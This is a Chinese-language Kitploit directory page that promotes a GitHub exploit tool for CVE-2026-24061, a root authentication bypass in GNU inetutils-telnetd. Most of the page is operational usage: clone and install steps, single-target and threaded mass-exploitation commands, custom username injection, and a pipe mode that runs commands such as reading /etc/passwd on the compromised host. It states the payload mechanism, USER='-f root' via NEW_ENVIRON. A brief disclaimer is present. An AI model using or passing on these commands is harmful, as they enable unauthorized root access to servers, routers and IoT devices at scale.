Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-24061-PoC-Exploit — 远程认证绕过漏洞利用工具,针对 GNU inetutils-telnetd(CVE-2026-24061),通过 CRLF 注入获取即时 root shell。支持单个/批量利用、多线程、自定义端口、管道模式及会话保持。 | Kitploit
工具/GitHubGitHub/tc4dy/cve-2026-24061-poc-exploit
漏洞分析漏洞利用渗透测试命令与控制远程访问工具Payload 开发
GitHubtc4dy/cve-2026-24061-poc-exploit

CVE-2026-24061-PoC-Exploit

远程认证绕过漏洞利用工具,针对 GNU inetutils-telnetd(CVE-2026-24061),通过 CRLF 注入获取即时 root shell。支持单个/批量利用、多线程、自定义端口、管道模式及会话保持。

查看仓库
644天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-24061

🚀 CVE-2026-24061 - GNU inetutils-telnetd 认证绕过利用工具

Python Bash License CVSS

GNU inetutils-telnetd 版 - CRLF 注入导致认证绕过和即时获取 Root Shell

📌 概述

此利用程序利用了 CVE-2026-24061,这是 GNU inetutils-telnetd 中的一个关键远程认证绕过漏洞。通过注入精心构造的 USER='-f root' 的 NEW_ENVIRON 有效载荷,它可以绕过认证并授予即时 Root Shell,无需任何凭据。

注意: basic_exploit.sh 脚本是 exploit.sh 的简化、更快的版本;但建议使用 exploit.sh 以获得完整功能。

🔥 主要功能

🎯 受影响版本

产品版本
GNU inetutils-telnetd1.9.3 - 2.7
受影响的 Linux 发行版Debian、CentOS、Ubuntu 及其衍生发行版 (Zorin OS、Linux Mint、Pop!_OS 和 Elementary OS)
嵌入式设备NAS、IoT、路由器

⚠️ 免责声明:此工具仅用于授权安全测试和教育目的。未经授权的访问是违法的。

📦 安装

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-24061-PoC-Exploit
cd CVE-2026-24061-PoC-Exploit

# Python version
pip3 install -r requirements.txt

# Bash version
chmod +x exploit.sh
chmod +x basic_exploit.sh

🛠️ 使用示例

🎯 单目标利用

root@kitploit:~
# Python version
python3 exploit.py -u 192.168.1.100

# Bash version
./exploit.sh -u 192.168.1.100
./basic_exploit.sh 192.168.1.100

🔧 自定义端口和用户

root@kitploit:~
# Custom port (non-standard telnet port)
python3 exploit.py -u 10.0.0.5 -p 2323

# Custom username injection
python3 exploit.py -u 10.0.0.5 -usr admin

📊 批量利用(多目标)

root@kitploit:~
# Create targets file
echo "192.168.1.100" > targets.txt
echo "192.168.1.101" >> targets.txt
echo "10.0.0.5:2323" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt -m 20

# Bash version
./exploit.sh -l targets.txt -m 20

📡 管道模式(命令执行)

root@kitploit:~
# Execute commands via pipe
echo "id; whoami; uname -a" | python3 exploit.py -u 192.168.1.100

# Multiple commands
echo "ls -la; cat /etc/passwd; ps aux" | ./exploit.sh -u 192.168.1.100

⚙️ 高级选项

root@kitploit:~
# Verbose mode with debug output
python3 exploit.py -u 192.168.1.100 -v

# Custom timeout and retries
python3 exploit.py -u 192.168.1.100 --timeout 10 --retries 5

# Session keep-alive (maintain shell)
python3 exploit.py -u 192.168.1.100 --keep-alive

📊 命令行参数

🔗 相关利用工具

查看我的其他利用仓库:

  • CVE-2026-41940
  • CVE-2026-0073
  • CVE-2026-29000
下载工具
类别功能
利用✅ 通过 CRLF 注入绕过认证
✅ 即时 Root Shell
✅ 自定义用户注入 (-f admin, -f user)
扫描✅ 单目标利用
✅ 从文件批量利用
✅ 多线程(可配置线程数)
✅ 自定义端口支持
高级✅ 管道模式(通过标准输入执行命令)
✅ 会话保活
✅ 重试机制
✅ 超时控制
可用性✅ 彩色输出 (colorama)
✅ 双语言 (Python 和 Bash)
✅ 详细/调试模式
短参数长参数描述默认值
-u--url目标 IP 地址必需
-p--port目标端口23
-l--list包含目标列表的文件无
-m--max-threads批量利用的最大线程数10
-usr--username要注入的用户名root
-t--timeout套接字超时(秒)10
-r--retries重试次数3
-v--verbose启用调试输出False
--keep-alive利用后保持会话存活False